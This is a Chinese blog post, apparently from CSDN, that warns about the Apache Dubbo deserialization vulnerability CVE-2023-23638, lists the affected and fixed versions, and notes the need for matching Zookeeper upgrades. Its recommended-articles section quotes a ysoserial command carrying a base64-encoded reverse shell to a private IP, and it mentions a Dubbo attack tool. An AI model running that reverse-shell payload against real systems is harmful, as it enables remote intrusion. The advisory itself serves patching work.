关于Apache Dubbo反序列化漏洞(CVE-2023-23638)的预警提示与对应的Zookeeper版本

最新推荐文章于 2023-08-25 20:26:35 发布
最新推荐文章于 2023-08-25 20:26:35 发布
阅读量1.8k 收藏 1
点赞数
文章标签: apache dubbo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011236069/article/details/131416671
版权

        公司在升级dubbo过程中因zookeeper版本不匹配,导致服务注册和调用出现异常

一、漏洞详情

Apache Dubbo是一款高性能、轻量级的开源Java服务框架。

Apache官方发布安全公告,修复了Apache Dubbo中的一个反序列化漏洞(CVE-2023-23638)。由于Apache Dubbo安全检查存在缺陷,导致可以绕过反序列化安全检查并执行反序列化攻击,成功利用该漏洞可在目标系统上执行任意代码。

建议受影响用户做好资产自查以及预防工作,以免遭受黑客攻击。

二、影响范围

Apache Dubbo 2.7.x 版本:<= 2.7.21

Apache Dubbo 3.0.x 版本:<= 3.0.13

Apache Dubbo 3.1.x 版本:<= 3.1.5

三、修复建议

目前该漏洞已经修复,受影响用户可升级到以下版本:

Apache Dubbo 版本:>= 2.7.22

Apache Dubbo 版本:>= 3.0.14

Apache Dubbo 版本:>= 3.1.6

四、以上漏斗如果注册中心选用的还是zookeeper,那么zk也需要对应的进行升级否则可能会导致服务提供者和消费者无法注册和获取服务列表

例:dubbo2.7.x升级至2.7.23相关maven以来所需版本

https://mvnrepository.com/artifact/org.apache.dubbo/dubbo/2.7.23

依赖jar包所需版本:(注意:zookeeper相关以来可以点进去) 

 

   进入org.apache.dubbo » dubbo-remoting-zookeeper (如果zk低于最低版本会导致dubbo服务注册和调用异常

五、关联资料 

 1. 关于Apache Dubbo反序列化漏洞(CVE-2023-23638)的预警提示

 2. Dubbo2.7.22相关依赖和版本(zk相关请继续点击查看)

二爵爷点灯
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Dubbo反序列化漏洞复现分析
include_voidmain的博客
03-10 3029
Apache Dubbo反序列化漏洞复现分析
shrio反序列漏洞修复_提醒:Apache Dubbo存在反序列化漏洞
weixin_39583521的博客
12-01 139
背景:近日监测到Apache Dubbo存在反序列化漏洞(CVE-2019-17564),此漏洞可导致远程代码执行。Apache Dubbo是一款应用广泛的高性能轻量级的Java RPC分布式服务框架。鉴于漏洞危害较大,建议尽快更新软件。情报通告:威胁程度:个人风险评级:低危企业风险评级:中危情报风险预警:对公司影响等级为中,对使用Apache Dubbo相应版本的企业均有被攻击的风险。情报描述:...
Apache Dubbo反序列化漏洞
蚁景网安学院
11-18 1500
Apache Dubbo反序列化漏洞复现及利用!
Apache Dubbo 存在反序列化漏洞CVE-2023-23638
murphysec的博客
03-09 4422
Apache Dubbo 是一款轻量级 Java RPC 框架 该项目受影响版本存在反序列化漏洞,由于Dubbo在序列化时检查不够全面,当攻击者可访问到dubbo服务时,可通过构造恶意请求绕过检查触发反序列化,执行恶意代码
SpringBoot-狂神(20. Springboot+Dubbo+Zookeeper)学习笔记
圆的博客
09-23 1910
上一篇 : 19. 异步、定时、邮件任务 文章目录1. 1.
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
CVE-2019-17564 Apache Dubbo Http 反序列化漏洞深入分析 .pdf
09-05
在2019年,Apache Dubbo暴露了一个严重的安全漏洞,即CVE-2019-17564,这是一个Http反序列化漏洞。该漏洞发生在启用HTTP远程处理的Dubbo应用程序中,攻击者可以通过发送包含恶意Java对象的POST请求,导致不安全的反...
Apache Dubbo远程代码执行漏洞(CVE-2021-43297)
10-25
Dubbo 升级到 2.6.12、2.7.15、3.0.5 及以上版本
dubbo-exp:Dubbo反序列化一键快速攻击测试工具,支持dubbo协议和http协议,支持hessian反序列化和java原生反序列化
05-09
工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责Dubbo反序列化测试工具使用帮助usage: java -jar exp.jar [OPTION]-h --help 帮助信息-l --list 输出所有gadget信息-g --gadget ...
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞(CVE-2018-2625)补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞(CVE-2018-2625) 补丁包 对应的weblogic的版本是12.1.3.0 有需要的下载
漏洞预警|Apache Dubbo 存在反序列化漏洞
LJQClqjc的博客
03-09 721
棱镜七彩安全预警
漏洞预警Apache Dubbo再现反序列化漏洞,腾讯安全已支持全方位检测防护
wzl_540的专栏
03-15 1263
(2)若直接编译、使用jar包构建项目,可查看jar包版本判断是否可能受漏洞影响(jar包全名:dubbo-x.x.x.jar / dubbo-common-x.x.x.jar,其中dubbo / dubbo-common为包名,x.x.x为版本)。(1)若使用maven构建项目,可在pom.xml等文件中查看引用的maven包版本(maven groupId: org.apache.dubbo,artifactId: dubbo / dubbo-common)。
Apache Dubbo 被曝出“高危”远程代码执行漏洞
Java后端技术
06-26 809
往期热门文章:1、《往期精选优秀博文都在这里了!》2、自从用完Gradle后,有点嫌弃Maven了!速度贼快!3、老大吩咐的可重入分布式锁,终于完美的实现了~4、多线程到底该设置多少个线...
Apache Dubbo 高危漏洞通告
程序猿DD
01-17 331
前沿技术早知道,弯道超车有希望积累超车资本,从关注DD开始作者:360CERT,图文编辑:xj来源:https://www.oschina.net/news/178522报告编号:B6...
rmi 反序列化漏洞_[漏洞分析]CVE201917564/Apache Dubbo存在反序列化漏洞
weixin_29284885的博客
01-07 233
漏洞描述Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行.CVE编号CVE-2020-17564...
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本
最新发布
精品博客,你值得一看~
08-25 1208
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
Dubbo反序列化漏洞分析集合
AS011x的博客
09-09 3767
调用相应的反序列化函数对数据流进行反序列化操作。,如果不满足则直接抛出异常。若pojo为Map实例,则从pojo(也就是一开始的第三个参数)获取key为“class”的值,并通过反射得到class所对应的类type,再判断对象的类型进行下一步处理。在之前的分析中我们知道了这个方法是用来获取数据体中的一些信息用的,其中一种利用方式就是通过在读取version的时候,调用readUTF方法,跟进。主要是通过获取tag位,进行相应的处理,但是这里关键的就是,当这里不是一个String类型的时候,将会抛出异常。
漏洞预警Apache Dubbo反序列化漏洞及修复方案
讯开技术孵化器博客
07-01 2662
漏洞描述 Apache Dubbo是一款应用广泛的Java RPC分布式服务框架。Apache Dubbo于2020年6月23日披露在Dubbo Provider中存在一个反序列化远程代码执行漏洞CVE-2020-1948),官方发布2.7.7版本修复漏洞,但近日该漏洞补丁被绕过,经阿里云工程师测试绕过有效,且目前官方还未发布新版本漏洞属0day级,风险极大。阿里云应急响应中心提醒Apache Dubbo用户尽快采取安全措施阻止漏洞攻击。 2020年6月29日,阿里云应急响应中心监测到Apache Du
Apache Dubbo 高危漏洞
zb_3Dmax的博客
09-06 789
具体是因为 Apache Dubbo hessian-lite 3.2.11 及之前的版本存在反序列化漏洞,而这个 hessina-lite 恰巧就是 Dubbo 默认的序列化方法。其实这个漏洞爆出来已经很多天了,影响面没 Log4j2 大,所以没那么“火”,不过也是个高危漏洞。今天又看到了个 Apache Dubbo 的高危漏洞通告,好家伙一看这版本,我们的应用有漏洞…所以用 Dubbo 的同学快去排查下自己的应用,看看是否受到影响。又是一个可以远程代码执行的漏洞漏洞的类型是因为反序列化的问题。
Dubbo 2.7.6 反序列化漏洞CVE-2020-1948:远程代码执行风险
Dubbo CVE-2020-1948 是一个关于Apache Dubbo服务框架的安全漏洞,它允许远程代码执行(RCE)。Dubbo是由阿里巴巴开发的一个广泛使用的高性能分布式服务框架,它简化了服务的生产和消费过程,特别适合微服务架构。此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值